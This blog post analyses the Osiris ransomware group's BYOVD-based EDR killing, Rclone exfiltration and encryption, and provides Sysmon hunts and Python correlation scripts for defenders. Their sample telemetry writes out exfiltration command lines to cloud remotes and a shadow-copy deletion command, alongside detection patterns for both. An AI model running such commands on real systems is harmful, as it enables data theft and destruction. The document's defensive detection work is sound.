How Osiris Ransomware Exposed the EDR Myth
Emerging in late 2025, the Osiris RaaS group deployed a kernel-level EDR termination technique against enterprise targets across Southeast Asian healthcare and critical infrastructure — days before any encryption payload landed.
By the time defenders noticed the encryption, the data was already gone and endpoint protection had been silently killed from the inside. The attack vector wasn’t a zero-day. It was a legitimately signed driver.
This article breaks down exactly how Osiris ransomware 2026 operates, why your current EDR configuration may not survive it, and the specific Sysmon queries that give you a fighting chance at catching it early.
What You’ll Learn
- Why the 2026 strain doesn’t share code with 2016 Locky
- How BYOVD tactics blind your SOC team completely
- Why legitimate tools like Wasabi are your primary warning
- Exact Sysmon Event ID 1 queries to catch early exfiltration
- How aspiring analysts can hunt for kernel-level threats
Osiris ransomware 2026 doesn’t break through your defenses — it disables them first.
Osiris ransomware 2026 is a sophisticated RaaS threat that disables EDR systems using BYOVD (Bring Your Own Vulnerable Driver) attacks. It typically utilizes the POORTRY driver to gain kernel-level access, allowing it to terminate security software before encrypting data with AES-128-CTR and exfiltrating files to cloud providers like Wasabi.
Osiris isn’t just another encryption script; it’s a systematic EDR lobotomy. The most dangerous part of this attack isn’t the encryption phase at all. It’s the moment attackers turn your multi-million dollar endpoint protection into a silent, useless brick before you even know they are inside. Traditional detection mechanisms are failing under the weight of this new methodology.
The EDR Killer: Why Osiris Ransomware 2026 is a Tier-1 Threat
Think of Osiris ransomware as a strike team that cuts the fiber lines and knocks out the guards before they even touch the vault. Emerging in late 2025 as a highly sophisticated Ransomware-as-a-Service (RaaS) operation, Osiris represents a stark reality for enterprise defenders. According to the 2026 Symantec/Carbon Black report, ransomware actors claimed 4,737 attacks in 2025.
While the 2025 Sophos threat report noted the average ransom payment dropped to $1.0M, the frequency of these mid-tier, highly targeted hits is accelerating. Southeast Asian food service operators, healthcare facilities, and critical infrastructure are taking the brunt of the damage.
Osiris proves that if you own the driver, you own the detection. Once attackers secure administrative rights, your security software is simply uninstalled by force.
A Tale of Two Osirises: Clearing the Threat Intel Trap
Don’t confuse this with the 2016 Locky variant. They share a name; they don’t share code. Relying on legacy threat feeds that confuse the two will leave your SOC flying blind. If your detection engineers are hunting for decade-old Locky hashes, the new Osiris operators will walk right past your perimeter.
Audit your SIEM and threat intelligence platforms immediately. Ensure your feeds are specifically tracking the 2025/2026 Osiris RaaS indicators and modern LotL (Living off the Land) tool signatures.
The Osiris Attack Anatomy: From Initial Access to Extortion
Osiris operators are incredibly methodical. They rely heavily on dual-use tools to blend into your daily administrative network traffic. The intrusion usually starts with compromised RDP credentials or the exploitation of edge vulnerabilities. A prime example is the heavy targeting of Citrix NetScaler flaws like CVE-2023-4966 (Citrix Bleed) for initial access.
Once inside, they establish a foothold, but the actual ransomware payload won’t drop for days.
Hunting Osiris: Catching Exfiltration Before the EDR Lobotomy
Because the ransomware payload effectively ends your visibility, catching the exfiltration phase is your best chance at stopping Osiris. The threat actors frequently use Rclone to push sensitive data to legitimate cloud storage providers like Wasabi or Mega. You cannot wait for a massive bandwidth alert; you need to hunt for the process creation.
If you are collecting Sysmon telemetry, hunt Event ID 1 (Process Creation) for Rclone executions carrying its characteristic command-line arguments, and pair that with Event ID 3 (Network Connection) for the destination:
EventID: 1
Image: *\rclone.exe
CommandLine: *--config* AND *--ignore-existing*
EventID: 3
DestinationHostname: *.wasabisys.com*
The pseudo-query above targets Rclone's characteristic arguments. Note that Event ID 1 carries no destination fields; DestinationHostname, DestinationIp and DestinationPort live on Event ID 3, and the two events join on ProcessGuid. Osiris operators also rename Rclone to evade basic name matching, so monitor by behavior and destination, not filename alone.
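The hunt described above, written out as an added example (this is not code from the article). It assumes Sysmon events have already been flattened into Python dicts carrying EventID plus the EventData fields Sysmon emits for Event ID 1 and Event ID 3; the sample events, GUIDs, paths and the `wb:`/`mg:` remote names are constructed. It goes a step beyond the pseudo-query: it uses Sysmon's OriginalFileName to catch a renamed rclone.exe, falls back to the command-line flags when the version resource has been patched, and joins each process to its Event ID 3 destinations on ProcessGuid.

```python
"""Hunt Sysmon telemetry for Rclone-style exfiltration to cloud storage.

Added example, not the article's code. Events are assumed flattened into
dicts (EventID plus Sysmon EventData fields). Sample events are constructed.
"""
import fnmatch
import re
from collections import defaultdict

# Cloud endpoints the article names as Osiris drop points; extend with any
# provider your organisation never uses legitimately.
EXFIL_DESTINATIONS = ("*.wasabisys.com", "*.mega.nz", "*.mega.co.nz")

# Flags typical of an Rclone bulk push; two of them together is the signal,
# whatever the binary happens to be called.
RCLONE_FLAGS = {"--config", "--ignore-existing", "--transfers",
                "--bwlimit", "--no-check-certificate"}

# An Rclone remote looks like "name:bucket/path". Requiring two or more
# characters before the colon keeps Windows drive letters (C:\...) out.
REMOTE_TARGET = re.compile(r"\b[a-z0-9_-]{2,}:[^\\/\s]")


def looks_like_rclone(event):
    """Name-independent Rclone detection.

    Sysmon reads OriginalFileName from the PE version resource, so a renamed
    rclone.exe still reports "rclone.exe" unless the attacker also patched
    the binary; the command-line check covers that case.
    """
    image = (event.get("Image") or "").lower()
    original = (event.get("OriginalFileName") or "").lower()
    cmd = (event.get("CommandLine") or "").lower()
    if original == "rclone.exe" or image.endswith("\\rclone.exe"):
        return True
    flags_seen = RCLONE_FLAGS.intersection(cmd.split())
    return len(flags_seen) >= 2 or bool(flags_seen and REMOTE_TARGET.search(cmd))


def is_renamed(event):
    original = (event.get("OriginalFileName") or "").lower()
    image = (event.get("Image") or "").lower()
    return original == "rclone.exe" and not image.endswith("\\rclone.exe")


def hunt(events):
    """Return one finding per Rclone-like process, joined on ProcessGuid to
    the destinations Sysmon recorded for it in Event ID 3."""
    rclone_procs = {}
    destinations = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 1 and looks_like_rclone(ev):
            rclone_procs[ev["ProcessGuid"]] = ev
        elif ev["EventID"] == 3:
            host = (ev.get("DestinationHostname") or ev.get("DestinationIp") or "").lower()
            destinations[ev["ProcessGuid"]].add(host)

    findings = []
    for guid, ev in rclone_procs.items():
        cloud = sorted(h for h in destinations.get(guid, ())
                       if any(fnmatch.fnmatchcase(h, p) for p in EXFIL_DESTINATIONS))
        findings.append({
            "ProcessGuid": guid,
            "Image": ev["Image"],
            "renamed": is_renamed(ev),
            "cloud_destinations": cloud,
            # Any Rclone run is a priority alert; a cloud destination makes it critical.
            "severity": "critical" if cloud else "high",
        })
    return findings


SAMPLE_EVENTS = [  # constructed sample telemetry, not real logs
    # Rclone renamed to blend in; OriginalFileName gives it away.
    {"EventID": 1, "ProcessGuid": "{guid-1}", "Image": "C:\\ProgramData\\svchost_update.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": "svchost_update.exe copy D:\\Finance wb:backups/fin "
                    "--config C:\\ProgramData\\r.conf --ignore-existing --transfers 16 -q"},
    {"EventID": 3, "ProcessGuid": "{guid-1}", "Image": "C:\\ProgramData\\svchost_update.exe",
     "DestinationHostname": "s3.ap-southeast-1.wasabisys.com", "DestinationPort": "443"},
    # Legitimate admin copy to an internal file server: must not fire.
    {"EventID": 1, "ProcessGuid": "{guid-2}", "Image": "C:\\Windows\\System32\\Robocopy.exe",
     "OriginalFileName": "robocopy.exe", "CommandLine": "robocopy D:\\Finance \\\\fs01\\backup /MIR"},
    {"EventID": 3, "ProcessGuid": "{guid-2}", "Image": "C:\\Windows\\System32\\Robocopy.exe",
     "DestinationHostname": "fs01.corp.local", "DestinationPort": "445"},
    # Version resource patched, so no OriginalFileName; the flags still match.
    {"EventID": 1, "ProcessGuid": "{guid-3}", "Image": "C:\\Users\\Public\\update.exe",
     "OriginalFileName": "",
     "CommandLine": "update.exe sync E:\\HR mg:dump --config C:\\Users\\Public\\rc.conf --transfers 8"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Sysmon fills DestinationHostname from a reverse DNS lookup, and object-storage endpoints do not always resolve back to the provider's name, so in production pair this join with proxy or DNS logs (or DestinationIp ranges) rather than relying on the hostname alone.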
The “Killer” Move: BYOVD and the POORTRY Driver
This is the exact moment Osiris separates itself from script-kiddie ransomware operations. Before deploying the encryptor, the attackers execute a Bring Your Own Vulnerable Driver (BYOVD) attack.
The attackers drop a tool called KillAV alongside the POORTRY driver (also tracked as Abyssworker). POORTRY exploits a known vulnerability within a legitimately signed driver. Because the signature is cryptographically valid, Windows allows it to load. From the kernel (Ring 0), they have ultimate authority and brutally kill all EDR processes from the bottom up.
User-mode protections cannot stop kernel-mode attacks. If an attacker achieves administrative rights and drops a vulnerable driver, your EDR cannot defend itself.
The Final Blow: Unbreakable Encryption
Once the environment is blind and your data is sitting in an attacker-controlled Wasabi bucket, Osiris executes the final payload. First, it deletes Volume Shadow Copies (VSS) to ensure you cannot easily restore your servers. Then, it initiates a hybrid encryption scheme utilizing ECC and AES-128-CTR.
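The BYOVD driver load, the EDR process kills and the shadow-copy deletion described in the two sections above form one ordered sequence per host, and that ordering is what a detection should key on. The added example below (not code from the article or any EDR vendor) correlates Sysmon Event ID 6 (Driver Loaded), Event ID 5 (Process Terminated) and Event ID 1 (Process Creation) on a flattened event stream. It assumes each event carries a Computer field and Sysmon's UtcTime; the blocklist hash, the agent process names list and all sample events are constructed placeholders, and the real hashes should come from Microsoft's vulnerable driver blocklist policy.

```python
"""Correlate the pre-encryption sequence: a suspicious kernel driver load
(Sysmon Event ID 6), security-agent process terminations (Event ID 5), then
shadow-copy deletion (Event ID 1).

Added example, not the article's code. Events are assumed flattened into
dicts with Computer and UtcTime; sample data and hashes are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Legitimate driver locations; anything loaded from elsewhere deserves a look.
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",
                       "c:\\windows\\system32\\driverstore\\")
# Placeholder standing in for hashes from Microsoft's vulnerable driver
# blocklist; load the real WDAC policy values here instead.
BLOCKED_DRIVER_SHA256 = {"0000placeholder_sha256_of_blocklisted_driver"}
# Common security-agent process names; substitute your own vendor's.
EDR_PROCESS_NAMES = {"msmpeng.exe", "mssense.exe", "csfalconservice.exe", "sentinelagent.exe"}
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|win32_shadowcopy",
    re.I)


def ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return (path or "").rsplit("\\", 1)[-1].lower()


def parse_hashes(field):
    """Sysmon writes the Hashes field as 'SHA256=...,MD5=...,IMPHASH=...'."""
    out = {}
    for part in (field or "").split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().upper()] = value.strip().lower()
    return out


def driver_load_reasons(event):
    """Why an Event ID 6 is suspicious. A valid signature is deliberately not
    treated as a pass: BYOVD drivers are validly signed, which is the point."""
    reasons = []
    path = (event.get("ImageLoaded") or "").lower()
    if not path.startswith(TRUSTED_DRIVER_DIRS):
        reasons.append("driver loaded from outside the driver store")
    if parse_hashes(event.get("Hashes")).get("SHA256") in BLOCKED_DRIVER_SHA256:
        reasons.append("hash is on the vulnerable driver blocklist")
    return reasons


def correlate(events, window=timedelta(minutes=15), min_kills=2):
    """Per host, attach what followed each suspicious driver load inside the
    window and grade the sequence by how far along the chain it got."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev.get("Computer", "unknown")].append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=ts)
        for i, ev in enumerate(evs):
            if ev["EventID"] != 6:
                continue
            reasons = driver_load_reasons(ev)
            if not reasons:
                continue
            kills, shadow_cmds = [], []
            for later in evs[i + 1:]:
                if ts(later) - ts(ev) > window:
                    break
                if later["EventID"] == 5 and basename(later.get("Image")) in EDR_PROCESS_NAMES:
                    kills.append(basename(later["Image"]))
                elif later["EventID"] == 1 and SHADOW_DELETE.search(later.get("CommandLine") or ""):
                    shadow_cmds.append(later["CommandLine"])
            if shadow_cmds:
                stage = "pre-encryption"
            elif len(kills) >= min_kills:
                stage = "edr-tampering"
            else:
                stage = "suspicious-driver-load"
            alerts.append({"host": host, "driver": ev["ImageLoaded"], "reasons": reasons,
                           "edr_terminated": kills, "shadow_copy_commands": shadow_cmds,
                           "stage": stage})
    return alerts


SAMPLE_EVENTS = [  # constructed sample telemetry, not real logs
    {"EventID": 6, "Computer": "WS-FIN-07", "UtcTime": "2026-01-14 02:30:11.000",
     "ImageLoaded": "C:\\Users\\Public\\drv\\kprocfix.sys", "Signed": "true",
     "Hashes": "SHA256=0000placeholder_sha256_of_blocklisted_driver"},
    {"EventID": 5, "Computer": "WS-FIN-07", "UtcTime": "2026-01-14 02:30:14.250",
     "Image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe"},
    {"EventID": 5, "Computer": "WS-FIN-07", "UtcTime": "2026-01-14 02:30:14.900",
     "Image": "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"},
    {"EventID": 5, "Computer": "WS-FIN-07", "UtcTime": "2026-01-14 02:30:20.000",
     "Image": "C:\\Windows\\System32\\notepad.exe"},  # unrelated exit, ignored
    {"EventID": 1, "Computer": "WS-FIN-07", "UtcTime": "2026-01-14 02:41:03.500",
     "Image": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    # Routine driver load on another host: no alert expected.
    {"EventID": 6, "Computer": "SRV-DB-02", "UtcTime": "2026-01-14 02:35:00.000",
     "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys", "Signed": "true",
     "Hashes": "SHA256=1111placeholder_sha256_of_legitimate_driver"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The stage field is the useful output: a lone driver load from a user-writable path is worth a ticket, but the same load followed by agent terminations and a vssadmin delete is the last window before encryption, and should page someone.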
What You Should Do Now
If You’re a Security Professional
- Hunt for LotL Tools: Query your SIEM for the execution of Rustdesk, Rclone, Netscan, or MeshAgent.
- Implement Driver Blocklists: Enforce Microsoft’s Vulnerable Driver Blocklist via WDAC to prevent known drivers like POORTRY from loading.
- Monitor Cloud Storage Traffic: Create alerts for outbound traffic destined for Wasabi or Mega.
If You’re an Aspiring Analyst
- Learn Kernel Debugging Basics: Understand the difference between Ring 3 and Ring 0 execution.
- Master Sysmon Telemetry: Practice writing queries for Event ID 1 and Event ID 3.
- Write Custom YARA Rules: Identify behavioral execution of tools like Rustdesk being renamed.
The EDR Myth Is Exposed — Now What?
Osiris ransomware 2026 is a sobering reminder that no single security control is a guarantee. When attackers can weaponize a legitimately signed driver to silence your endpoint protection from the kernel level, the perimeter is not where this fight is won or lost. Visibility into LotL tool execution, Rclone exfiltration behavior, and vulnerable driver loads is what keeps defenders one step ahead.
The SOC teams that survive this threat will be the ones hunting before the encryption phase — not responding after it. Implement the WDAC driver blocklist, deploy granular Sysmon logging, and treat any Rclone execution as a critical priority alert.
Have you caught unauthorized remote access tools or Rclone syncing in your environment before a major incident? Share your experience in the comments.
